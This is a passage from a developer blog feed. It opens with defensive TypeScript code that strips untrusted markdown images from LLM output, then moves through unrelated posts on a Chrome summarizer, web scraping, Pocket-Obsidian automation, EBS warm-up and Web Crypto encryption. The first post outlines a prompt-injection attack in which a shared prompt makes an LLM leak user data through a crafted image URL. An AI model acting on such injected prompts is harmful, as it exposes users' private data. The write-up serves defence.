&lt;h2&gt;Example Code: Protecting Your LLM Application&lt;/h2&gt;
&lt;p&gt;Let&apos;s look at some practical TypeScript examples using the &lt;code&gt;remark&lt;/code&gt; library for rendering markdown to HTML:&lt;/p&gt;
&lt;h3&gt;Disabling Image Embedding&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;import { remark } from &quot;remark&quot;;
import html from &quot;remark-html&quot;;
import { visit } from &quot;unist-util-visit&quot;;

interface ImageNode {
  type: &quot;image&quot;;
  url: string;
}

type MarkdownNode = ImageNode | any;

// Function to remove all image tags
const removeImage = (): ((tree: MarkdownNode) =&amp;gt; void) =&amp;gt; {
  return (tree: MarkdownNode) =&amp;gt; {
    visit(
      tree,
      &quot;image&quot;,
      (node: ImageNode, index: number | undefined, parent: MarkdownNode) =&amp;gt; {
        parent.children.splice(index!, 1); // Remove the image tag
        return index; // resume at this index so the next sibling is not skipped
      }
    );
  };
};

const markdown = `# Example Markdown
This is a paragraph.
![An image](https://example.com/image.png)
Another paragraph.
`;

remark()
  .use(removeImage)
  .use(html)
  .process(markdown, function (err, file) {
    if (err) throw err;
    console.log(String(file));
  });

&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Whitelisting Trusted Hosts&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;import { remark } from &quot;remark&quot;;
import html from &quot;remark-html&quot;;
import { visit } from &quot;unist-util-visit&quot;;
const trustedHosts = [&quot;https://example.com&quot;]; // Manage your whitelist here

interface ImageNode {
  type: &quot;image&quot;;
  url: string;
}

type MarkdownNode = ImageNode | any;

const safeImageEmbedding = (): ((tree: MarkdownNode) =&amp;gt; void) =&amp;gt; {
  return (tree: MarkdownNode) =&amp;gt; {
    visit(
      tree,
      &quot;image&quot;,
      (node: ImageNode, index: number | undefined, parent: MarkdownNode) =&amp;gt; {
        if (!trustedHosts.some((host) =&amp;gt; node.url.startsWith(host))) {
          parent.children.splice(index!, 1); // Remove untrusted image tags
          return index; // resume at this index so the next sibling is not skipped
        }
      }
    );
  };
};

const markdown = `# Example Markdown
This is a paragraph.
![An image](https://example.com/image.png)
Another paragraph.

This is a dangerous image, but it will be removed by the safeImageEmbedding function
![An image](http://nottrusted.com/image.png)
`;

remark()
  .use(safeImageEmbedding)
  .use(html)
  .process(markdown, function (err, file) {
    if (err) throw err;
    console.log(String(file));
  });
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Important&lt;/strong&gt;: These methods provide a layer of protection but don&apos;t guarantee complete security. Thoroughly test your implementation to ensure it meets your specific security needs. While you could attempt to use regular expressions to replace image tags, this approach is prone to errors. Escape characters or cleverly crafted input could bypass your regex patterns. Directly manipulating the Abstract Syntax Tree (AST) parsed by your markdown library is a much more robust and reliable solution.&lt;/p&gt;
&lt;h2&gt;Why This Matters, Especially for UGC&lt;/h2&gt;
&lt;p&gt;Services that encourage user-generated content (UGC), such as platforms for sharing LLM prompts, are particularly vulnerable:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A malicious user shares a seemingly helpful prompt.&lt;/li&gt;
&lt;li&gt;An unsuspecting user inputs this prompt into their LLM application.&lt;/li&gt;
&lt;li&gt;The LLM, potentially employing in-context learning, generates a response that incorporates the user&apos;s sensitive data within a crafted image URL.&lt;/li&gt;
&lt;li&gt;The malicious user receives the leaked data when the image is rendered.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;Remember:&lt;/strong&gt; This vulnerability extends beyond LLM applications. It&apos;s crucial to stay informed about security best practices for handling user-generated content and data privacy in any online service.&lt;/p&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://embracethered.com/blog/posts/2024/github-copilot-chat-prompt-injection-data-exfiltration/&quot;&gt;GitHub Copilot Chat: From Prompt Injection to Data Exfiltration · Embrace The Red&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://owasp.org/www-project-top-10-for-large-language-model-applications/&quot;&gt;OWASP Top 10 for Large Language Model Applications | OWASP Foundation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>Web Distiller AI: A Chrome Extension for Summarizing Web Pages</title><link>https://ainoya.dev/posts/web-distiller-ai-chrome-extension/</link><guid isPermaLink="true">https://ainoya.dev/posts/web-distiller-ai-chrome-extension/</guid><description>A Chrome extension that summarizes web page contents using the built-in Gemini Nano model. It offers secure in-browser summarization with translation options and markdown output. Easily copy the summary to your clipboard for quick access.</description><pubDate>Sat, 06 Jul 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;import Twitter from &apos;../../../components/Twitter.astro&apos;;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://x.com/naokiainoya/status/1809507529501688266&quot;&gt;Announcement post on X&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I’ve been working on &lt;a href=&quot;https://github.com/ainoya/chrome-extension-web-distiller-ai&quot;&gt;chrome-extension-web-distiller-ai&lt;/a&gt;, a Chrome extension designed to summarize web page contents using the built-in Gemini Nano model. This project utilizes local LLM technology to offer secure and efficient in-browser summarization without transmitting any content to external networks.&lt;/p&gt;
&lt;h2&gt;Key Features&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Summarization: Extracts and summarizes the main content of the currently viewed web page.&lt;/li&gt;
&lt;li&gt;Translation Options: Offers translation of summaries into English or Japanese.&lt;/li&gt;
&lt;li&gt;Markdown Output: Converts the extracted content into markdown format for easy readability.&lt;/li&gt;
&lt;li&gt;Clipboard Copy: Provides a convenient button to copy the summary to the clipboard.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Development Challenges&lt;/h2&gt;
&lt;p&gt;During the development of this extension, I encountered several challenges:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Context Length Issues: When the content exceeded the context length, I hit a &lt;code&gt;NotReadableError: The execution yielded a bad response.&lt;/code&gt; error. Unfortunately, Chrome&apos;s built-in Gemini Nano model has no publicly documented context-length limit; I hope these specifications will be published in the future.&lt;/li&gt;
&lt;li&gt;Unpredictable Errors: Certain content types caused similar errors during generation, and the exact cause remains unclear. This unpredictability required additional handling in the extension.&lt;/li&gt;
&lt;li&gt;Quality of Output: Initially, performing both summarization and translation in a single prompt significantly degraded the quality of the output. To resolve this, I separated the processes into distinct prompts, which improved the overall performance and quality.&lt;/li&gt;
&lt;/ol&gt;
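&lt;p&gt;For the third point, the fix was simply running two prompts in sequence instead of one combined prompt. A sketch of the two-step pipeline, with &lt;code&gt;runModel&lt;/code&gt; standing in for the built-in model session call (the signature is hypothetical: it takes a prompt and resolves to the model&apos;s text output):&lt;/p&gt;

```typescript
// Two-step pipeline: summarize first, then translate the summary in a separate
// prompt. Doing both in a single prompt degraded output quality in my testing.
async function summarizeThenTranslate(
  runModel: (prompt: string) => any, // stand-in for the Gemini Nano session call
  pageText: string,
  targetLanguage: string
) {
  const summary = await runModel("Summarize the following text:\n\n" + pageText);
  return await runModel(
    "Translate the following summary into " + targetLanguage + ":\n\n" + summary
  );
}
```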
&lt;h2&gt;Reflections&lt;/h2&gt;
&lt;p&gt;Developing Web Distiller AI has been an enlightening experience. Here are some of my thoughts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Expanded Utility: The ability to utilize LLM functionalities with just a properly set up Chrome browser represents a significant leap forward. This expands the practical utility of such models across various use cases.&lt;/li&gt;
&lt;li&gt;Potential for Web Services: While I developed this as a Chrome extension, it would also be interesting to implement it as a resident assistant on a web service platform. This could provide even more accessibility and convenience for users.&lt;/li&gt;
&lt;li&gt;Future of Gemini Nano: As a multimodal LLM, Gemini Nano holds tremendous potential. I look forward to the day when Chrome can handle not just text processing but also image OCR and voice recognition using this technology.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can check out the Web Distiller AI repository on GitHub to learn more about the project and try it out yourself.&lt;/p&gt;
</content:encoded></item><item><title>Improving Web Scraping with Readability and Table Support in Markdown</title><link>https://ainoya.dev/posts/use-readability/</link><guid isPermaLink="true">https://ainoya.dev/posts/use-readability/</guid><description>Switching from DOM Distiller to Readability for better content extraction and adding table support in Markdown using turndown.</description><pubDate>Tue, 18 Jun 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;I previously used &lt;a href=&quot;https://github.com/chromium/dom-distiller&quot;&gt;DOM Distiller&lt;/a&gt; for content extraction in my project &lt;a href=&quot;https://github.com/ainoya/cloudflare-dom-distiller&quot;&gt;cloudflare-dom-distiller&lt;/a&gt;. However, I have recently switched to &lt;a href=&quot;https://github.com/mozilla/readability&quot;&gt;Readability&lt;/a&gt; because it produces more visually appealing results. This change has significantly improved the markdown output, removing unwanted headers and footers and enhancing the overall look.&lt;/p&gt;
&lt;p&gt;Additionally, I have implemented support for the &lt;code&gt;&amp;lt;table&amp;gt;&lt;/code&gt; tag to output tables in Markdown format. For converting HTML to Markdown, I use &lt;a href=&quot;https://github.com/mixmark-io/turndown&quot;&gt;turndown&lt;/a&gt;, which has a plugin for GitHub Flavored Markdown (GFM), &lt;a href=&quot;https://github.com/mixmark-io/turndown-plugin-gfm&quot;&gt;turndown-plugin-gfm&lt;/a&gt;. Integrating this plugin has enabled seamless table conversion in Markdown.&lt;/p&gt;
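&lt;p&gt;As a minimal sketch of this setup (assuming the &lt;code&gt;turndown&lt;/code&gt; and &lt;code&gt;turndown-plugin-gfm&lt;/code&gt; packages are installed; the sample HTML is illustrative), table conversion looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Convert extracted HTML, including tables, to GitHub Flavored Markdown.
const TurndownService = require(&quot;turndown&quot;);
const { gfm } = require(&quot;turndown-plugin-gfm&quot;);

const turndown = new TurndownService({ headingStyle: &quot;atx&quot; });
turndown.use(gfm); // enables the tables, strikethrough, and task-list rules

const html =
  &quot;&amp;lt;table&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Tool&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Readability&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&quot;;
console.log(turndown.turndown(html)); // prints a GFM pipe table
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Without the plugin, turndown drops table structure entirely, so enabling the GFM rules is what makes the Markdown output round-trippable for tables.&lt;/p&gt;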
&lt;p&gt;While searching for similar functionalities, I came across an interesting open-source project and SaaS, &lt;a href=&quot;https://github.com/jina-ai/reader&quot;&gt;jina-ai/reader&lt;/a&gt;. This tool not only offers features comparable to cloudflare-dom-distiller but also includes web search capabilities, utilizing puppeteer to access the Brave search engine. For those seeking more advanced features, jina-ai/reader is a promising option.&lt;/p&gt;
</content:encoded></item><item><title>Enhancing Personal Knowledge Management with Pocket and Obsidian Integration</title><link>https://ainoya.dev/posts/distilled-pocket-article-to-obsidian/</link><guid isPermaLink="true">https://ainoya.dev/posts/distilled-pocket-article-to-obsidian/</guid><description>Streamline your knowledge management with Pocket and Obsidian integration. Learn about a custom solution using dom-distiller API and PocketMD scripts to automate article transfers, enhance productivity, and create an interconnected knowledge base, making research and note-taking more efficient.</description><pubDate>Thu, 13 Jun 2024 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;For my personal and professional needs, I rely on two powerful tools: &lt;a href=&quot;https://getpocket.com/&quot;&gt;Pocket&lt;/a&gt; for collecting and storing articles, and Obsidian for organizing and synthesizing my thoughts. This blog post explores how I integrated these tools to streamline my workflow and enhance productivity.&lt;/p&gt;
&lt;h2&gt;Using Pocket for Information Collection&lt;/h2&gt;
&lt;p&gt;Pocket is my go-to tool for gathering information from the internet. It&apos;s incredibly convenient to save articles and use them later for discussions with colleagues or casual conversations. The ability to have a curated library of articles at my fingertips significantly enhances the quality of my interactions and keeps me well-informed.&lt;/p&gt;
&lt;h2&gt;Organizing Thoughts with Obsidian&lt;/h2&gt;
&lt;p&gt;For organizing my personal thoughts and research, I use Obsidian. This powerful note-taking app allows me to create a structured and interconnected knowledge base. When transferring content from Pocket to Obsidian, I often refer back to the articles I&apos;ve saved in Pocket. However, manually adding links from Pocket to my Obsidian notes was becoming time-consuming.&lt;/p&gt;
&lt;h2&gt;Automating the Workflow&lt;/h2&gt;
&lt;p&gt;I wanted to find a way to automate the process of linking Pocket articles to my Obsidian notes. Since my Obsidian files are stored on iCloud and synced across my devices, I considered creating a script to fetch articles from Pocket locally.&lt;/p&gt;
&lt;h2&gt;Choosing an Independent Implementation&lt;/h2&gt;
&lt;p&gt;While implementing this directly as an Obsidian plugin was an option, I decided to take an independent approach. This would make it easier to batch process markdown files and maintain flexibility in how I manage my notes.&lt;/p&gt;
&lt;h2&gt;Implementing dom-distiller API and PocketMD&lt;/h2&gt;
&lt;p&gt;To achieve my goal, I developed two key components: the dom-distiller API and PocketMD.&lt;/p&gt;
&lt;h3&gt;dom-distiller API&lt;/h3&gt;
&lt;p&gt;I needed a way to extract essential content from saved HTML articles and convert them to markdown. This would also help reduce context length when processing with LLMs. By leveraging the &lt;a href=&quot;https://github.com/chromium/dom-distiller&quot;&gt;chromium/dom-distiller&lt;/a&gt; implementation and executing content extraction scripts with Puppeteer, I achieved the desired functionality.&lt;/p&gt;
&lt;p&gt;I developed the API to run on Cloudflare Workers, avoiding load on my local machine and leaving the door open to future integrations with tools like Make (formerly Integromat) and Zapier.&lt;/p&gt;
&lt;h3&gt;PocketMD&lt;/h3&gt;
&lt;p&gt;Next, I created a set of scripts called PocketMD to handle local processing of articles saved in Pocket. You can find the repository here: &lt;a href=&quot;https://github.com/ainoya/PocketMD&quot;&gt;ainoya/PocketMD&lt;/a&gt;. This setup involves storing data in SQLite for easy processing and includes the following features:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Retrieve articles from Pocket and save them in SQLite.&lt;/li&gt;
&lt;li&gt;Extract URLs from SQLite, fetch full text using the &lt;a href=&quot;https://github.com/ainoya/cloudflare-dom-distiller&quot;&gt;Distiller API&lt;/a&gt;, and save it.&lt;/li&gt;
&lt;li&gt;Generate summaries of articles using Google Vertex AI based on the information stored in SQLite.&lt;/li&gt;
&lt;li&gt;Convert the information to markdown format for use with Obsidian or similar applications.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;By using LLMs (Google Vertex AI), I generate summaries and Obsidian keywords, automatically creating links to existing notes. This interlinking enhances my thought organization in Obsidian.&lt;/p&gt;
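&lt;p&gt;That last conversion step can be sketched as a small pure function. This is an illustrative sketch only: the field names and the &lt;code&gt;[[wiki-link]]&lt;/code&gt; convention below are assumptions for the example, not PocketMD&apos;s actual schema.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Illustrative sketch: render one stored article (plus LLM outputs) as an
// Obsidian note. The field names below are assumed for the example.
type ArticleRow = {
  title: string;
  url: string;
  summary: string; // produced by the Vertex AI summarization step
  keywords: string[]; // produced by the keyword-extraction step
};

function toObsidianNote(row: ArticleRow): string {
  // Keywords become [[wiki-links]], so Obsidian connects this note to
  // existing notes with matching names.
  const links = row.keywords.map((k) =&amp;gt; `[[${k}]]`).join(&quot; &quot;);
  return [
    &quot;---&quot;,
    `source: ${row.url}`,
    &quot;---&quot;,
    `# ${row.title}`,
    &quot;&quot;,
    row.summary,
    &quot;&quot;,
    links,
  ].join(&quot;\n&quot;);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Each generated note then participates in Obsidian&apos;s graph automatically, because the wiki-links resolve against existing note titles.&lt;/p&gt;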
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The integration of Pocket and Obsidian through custom scripts has significantly improved my note management and information retrieval processes. With keyword links in Obsidian, I can quickly reference saved articles, enhancing the efficiency of my thought organization.&lt;/p&gt;
&lt;p&gt;Furthermore, the knowledge graph constructed in Obsidian aligns well with tools like &lt;a href=&quot;https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/&quot;&gt;Graph RAG&lt;/a&gt;. This allows for implementing solutions that leverage LLMs to propose resolutions across multiple articles, addressing common topics of interest.&lt;/p&gt;
&lt;p&gt;By automating the workflow between Pocket and Obsidian, I have created a seamless, efficient system that enhances my productivity and keeps my knowledge base robust and interconnected.&lt;/p&gt;
</content:encoded></item><item><title>Optimizing Model Load Times on EC2 with Pre-loaded AMIs</title><link>https://ainoya.dev/posts/ec2-model-loading-too-slow/</link><guid isPermaLink="true">https://ainoya.dev/posts/ec2-model-loading-too-slow/</guid><description>How I reduced initial model load times on EC2 instances by creating AMIs with pre-loaded models, identifying bottlenecks, and implementing a solution using the fio command to optimize disk I/O performance.</description><pubDate>Sat, 18 May 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Recently, I encountered a challenge while working with machine learning models on Amazon EC2. To speed up the initial loading of a pre-trained model, I decided to create an Amazon Machine Image (AMI) with the model already pre-loaded. However, I discovered that the first inference run after instance startup took over ten times longer than usual. Subsequent inferences ran at normal speed.&lt;/p&gt;
&lt;h2&gt;Inference Program Overview&lt;/h2&gt;
&lt;p&gt;Here&apos;s a simplified version of the inference program I used:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;model = Pipeline.from_pretrained(...)  # load the pre-trained model (options omitted)
model = model.to(device)  # this line takes an unusually long time during the first run
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Upon investigating the program logs, I found that the &lt;code&gt;model.to(device)&lt;/code&gt; line, which transfers the model to the device, was the main bottleneck. Using &lt;code&gt;dstat&lt;/code&gt;, I monitored system resource usage and noticed that disk I/O performance was significantly slower during the initial run.&lt;/p&gt;
&lt;h2&gt;Identifying the Issue&lt;/h2&gt;
&lt;p&gt;I discovered that when an EBS volume is created from a snapshot (as happens when launching an instance from an AMI), its storage blocks are pulled down from S3 lazily, the first time each block is accessed. This makes initial I/O operations slow, as described in the AWS documentation:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Empty EBS volumes receive their maximum performance the moment that they are created and do not require initialization (formerly known as pre-warming). For volumes, of any volume type, that were created from snapshots, the storage blocks must be pulled down from Amazon S3 and written to the volume before you can access them. This preliminary action takes time and can cause a significant increase in the latency of I/O operations the first time each block is accessed. Volume performance is achieved after all blocks have been downloaded and written to the volume.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Implementing the Solution&lt;/h2&gt;
&lt;p&gt;To address this, I wrote a script to read the model files using the &lt;code&gt;fio&lt;/code&gt; command at instance startup. &lt;code&gt;fio&lt;/code&gt; is a flexible I/O tester with more options than &lt;code&gt;dd&lt;/code&gt;, and it supports asynchronous I/O, making it faster for reading files.&lt;/p&gt;
&lt;p&gt;Here&apos;s the &lt;code&gt;fio&lt;/code&gt; command I used:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;fio --name=&quot;read_test&quot; --filename=&quot;$file&quot; --rw=read --bs=1M --ioengine=libaio --iodepth=32 --direct=1
&lt;/code&gt;&lt;/pre&gt;
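&lt;p&gt;For comparison, the same warm-up can be done without &lt;code&gt;fio&lt;/code&gt;. The sketch below (Node.js; the model directory path is illustrative) simply reads every file once, which forces EBS to pull the underlying blocks from S3, albeit without fio&apos;s asynchronous I/O:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Hedged alternative to fio: read every file under the model directory once
// so that all EBS blocks are fetched from S3 before the first inference.
const fs = require(&quot;fs&quot;);
const path = require(&quot;path&quot;);

function warmRead(dir) {
  for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
    const p = path.join(dir, entry.name);
    if (entry.isDirectory()) {
      warmRead(p); // recurse into subdirectories
    } else {
      fs.readFileSync(p); // reading the whole file touches every block
    }
  }
}

if (fs.existsSync(&quot;/opt/models&quot;)) {
  warmRead(&quot;/opt/models&quot;); // illustrative model directory
}
&lt;/code&gt;&lt;/pre&gt;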
&lt;h2&gt;Alternative Solutions&lt;/h2&gt;
&lt;p&gt;Another potential solution is to use &lt;a href=&quot;https://docs.aws.amazon.com/ebs/latest/userguide/ebs-fast-snapshot-restore.html&quot;&gt;EBS fast snapshot restore&lt;/a&gt;, which preloads snapshots and eliminates the initial load time overhead. However, this option incurs additional costs, so I opted not to use it in this case.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Instances launched from AMIs with pre-loaded models experience slow initial model loads because EBS blocks are fetched from S3 on first access. The issue is more pronounced with larger model files.&lt;/li&gt;
&lt;li&gt;Using &lt;code&gt;fio&lt;/code&gt; to read model files at startup mitigates this problem by preloading data, significantly reducing initial load times.&lt;/li&gt;
&lt;li&gt;Alternative solutions include using fast snapshot restore or other high-performance distributed storage solutions like &lt;a href=&quot;https://cloud.google.com/parallelstore?hl=en&quot;&gt;Parallelstore&lt;/a&gt; or &lt;a href=&quot;https://www.colfax-intl.com/solutions/intel-daos&quot;&gt;DAOS&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.aws.amazon.com/ebs/latest/userguide/ebs-initialize.html&quot;&gt;Initialize Amazon EBS volumes - Amazon EBS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.colfax-intl.com/solutions/intel-daos&quot;&gt;DAOS Storage and High Performance Computing (HPC) Solutions&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>Accelerating Company Culture And Value Assimilation Among Employees Through Generative AI</title><link>https://ainoya.dev/posts/zapier-openai-accelerate-culture-value/</link><guid isPermaLink="true">https://ainoya.dev/posts/zapier-openai-accelerate-culture-value/</guid><description>Discusses methods using Zapier and OpenAI to support the awareness and maintenance of company culture and values among employees.</description><pubDate>Mon, 06 May 2024 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Maintaining and reinforcing a company&apos;s culture and values among employees can be a challenging task. It&apos;s crucial for employees to be consistently aware of these values to sustain and enrich the company&apos;s culture. Implementing systems that simplify this awareness and empower employees according to these values is essential. However, amidst busy work schedules, it can become difficult to continually focus on these values. &lt;a href=&quot;https://handbook.gitlab.com/handbook/communication/#values-emoji&quot;&gt;At GitLab&lt;/a&gt;, a novel approach involves using emojis linked to company values to remind employees of these principles regularly. This blog explores how we can leverage tools like Zapier and OpenAI to further facilitate the integration of company values among team members.&lt;/p&gt;
&lt;h2&gt;Using Value Emojis to Foster Awareness&lt;/h2&gt;
&lt;p&gt;At GitLab, value emojis are a core part of daily communication, helping to embed company values in everyday interactions. When someone posts a value emoji in Slack, it&apos;s automatically shared in a dedicated channel via the &lt;a href=&quot;https://slack.com/intl/en-gb/help/articles/360000482666-Reacji-Channeler-for-Slack&quot;&gt;Reacji Channeler&lt;/a&gt;, promoting value-driven discussions. Inspired by this, I experimented with a setup that could automate and quantify the representation of company values within team communications.&lt;/p&gt;
&lt;h3&gt;Weekly Retrospectives with Value Emoji Summaries&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://ainoya.dev/posts/zapier-openai-accelerate-culture-value/images/value-summary.png&quot; alt=&quot;Value Emoji Summary&quot; /&gt;&lt;/p&gt;
&lt;p&gt;To facilitate reflection on value alignment in team meetings, I created two Zaps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Capturing Slack posts with value emoji reactions and saving them to a &lt;a href=&quot;https://zapier.com/blog/zapier-tables-guide/&quot;&gt;Zapier Table&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Triggering a collection of the past week&apos;s posts when &lt;code&gt;@value-bot retrospective&lt;/code&gt; is mentioned in Slack, summarizing and posting the frequency of each emoji used.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This system allowed the team to easily recall discussions from the past week and focus on areas needing improvement in terms of value alignment, making our weekly retrospectives more efficient and focused.&lt;/p&gt;
&lt;h2&gt;Automating Value-Based Evaluations of Communications&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://ainoya.dev/posts/zapier-openai-accelerate-culture-value/images/value-eval.png&quot; alt=&quot;Value-Based Evaluation&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Building on the previous automation, I developed a method to summarize and evaluate team communications based on adherence to company values using Google Sheets and OpenAI API:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Storing Slack posts in Google Sheets.&lt;/li&gt;
&lt;li&gt;Triggering a summary and evaluation of these posts in Slack when &lt;code&gt;@value-bot value rating&lt;/code&gt; is mentioned.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The prompt for the AI was structured to assess the content against our defined company values, providing a rating from 1 (lowest) to 5 (highest). This method provides a gamified, unbiased feedback mechanism, engaging employees in a fun, interactive review of their communications.&lt;/p&gt;
&lt;p&gt;Prompt example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Please evaluate the Slack log for today based on the evaluation criteria on a scale of 1 to 5, where 1 is the lowest and 5 is the highest rating.
The team members are Alice, Bob, and Charlie. Please focus on their statements for evaluation.

The evaluation criteria are as follows:

1. Value 1: {Value1 Explanation...}
2. Value 2: {Value2 Explanation...}

---Below is the content of the Slack log---
{Here, expand the list of Slack posts obtained in the previous step on Zapier}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;By combining Zapier and OpenAI, I was able to create an advanced system for ingraining company values within the team&apos;s daily operations. The automation provides a bias-free way to reflect on and enhance our adherence to these values. However, it&apos;s important to remember that AI-generated evaluations can be imperfect. They should not directly affect employee evaluations or appraisals but instead serve as a casual reminder and reinforcement of company values. This system is highly recommended for companies looking to deepen value integration in a fun and engaging way.&lt;/p&gt;
&lt;h2&gt;Reference&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://handbook.gitlab.com/handbook/values/&quot;&gt;GitLab Values | The GitLab Handbook&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://handbook.gitlab.com/&quot;&gt;The GitLab Handbook&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://handbook.gitlab.com/handbook/company/culture/&quot;&gt;GitLab Culture | The GitLab Handbook&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://handbook.gitlab.com/handbook/communication/#values-emoji&quot;&gt;GitLab Communication | The GitLab Handbook&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>Using the Web Crypto API for Secure Encryption and Decryption</title><link>https://ainoya.dev/posts/web-crypto-api-encryption-decryption/</link><guid isPermaLink="true">https://ainoya.dev/posts/web-crypto-api-encryption-decryption/</guid><description>Learn how to use the Web Crypto API for secure encryption and decryption of sensitive data like API keys, especially in environments like Cloudflare Workers.</description><pubDate>Sat, 04 May 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Securely managing sensitive information such as API keys in web services is crucial. My focus was on encrypting this data in a decryptable manner without depending on Node.js libraries, particularly in environments like Cloudflare Workers. This led me to explore the Web Crypto API, which provides a robust solution for secure cryptographic operations directly in the browser, free from Node.js Library dependencies.&lt;/p&gt;
&lt;h2&gt;Why Web Crypto API?&lt;/h2&gt;
&lt;p&gt;I chose the &lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/API/Web_Crypto_API&quot;&gt;Web Crypto API&lt;/a&gt; for its strong security features and broad support across modern browsers. Importantly, it operates in restricted environments like Cloudflare Workers, making it ideal for my requirements.&lt;/p&gt;
&lt;p&gt;For encryption and decryption, I implemented the &lt;code&gt;AES-256-GCM&lt;/code&gt; method. This choice was influenced by GitLab&apos;s &lt;a href=&quot;https://handbook.gitlab.com/handbook/security/cryptographic-standard/#algorithmic-standards:~:text=Block%20Ciphers%20%2D%20AES.%20Currently%20AES%2D128%20is%20considered%20the%20minimal%2C%20but%20to%20ensure%20%E2%80%9Cfuture%20proofing%E2%80%9D%20AES%2D256%20is%20preferred%20(note%20there%20are%20potential%20performance%20impacts%20depending%20upon%20application%20usage%2C%20etc).%20GCM%20is%20the%20required%20mode%20(e.g.%20aes%2D256%2Dgcm).&quot;&gt;cryptographic standards&lt;/a&gt;, which suggests AES-256 for &quot;future-proofing&quot; despite potential performance impacts.&lt;/p&gt;
&lt;h2&gt;Implementation Code&lt;/h2&gt;
&lt;p&gt;Below is the TypeScript code for encryption and decryption, which can be included in your projects:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// ~/utils/encryptor.server.ts
// Purpose: Encryptor utility for encrypting and decrypting data.
const algorithm = &quot;AES-GCM&quot;;

function base64ToArrayBuffer(base64: string): ArrayBuffer {
  const binaryString = atob(base64);
  const len = binaryString.length;
  const bytes = new Uint8Array(len);
  for (let i = 0; i &amp;lt; len; i++) {
    bytes[i] = binaryString.charCodeAt(i);
  }
  return bytes.buffer;
}

function arrayBufferToBase64(buffer: ArrayBuffer): string {
  let binary = &quot;&quot;;
  const bytes = new Uint8Array(buffer);
  const len = bytes.byteLength;
  for (let i = 0; i &amp;lt; len; i++) {
    binary += String.fromCharCode(bytes[i]);
  }
  return btoa(binary);
}

export async function encrypt(
  data: string,
  keyBase64Encoded: string
): Promise&amp;lt;string&amp;gt; {
  const keyBuffer = base64ToArrayBuffer(keyBase64Encoded);

  const cryptoKey = await crypto.subtle.importKey(
    &quot;raw&quot;,
    keyBuffer,
    { name: algorithm, length: 256 },
    false,
    [&quot;encrypt&quot;]
  );

  const iv = crypto.getRandomValues(new Uint8Array(12));
  const encryptedData = await crypto.subtle.encrypt(
    { name: algorithm, iv: iv },
    cryptoKey,
    new TextEncoder().encode(data)
  );

  const combined = new Uint8Array(iv.length + encryptedData.byteLength);
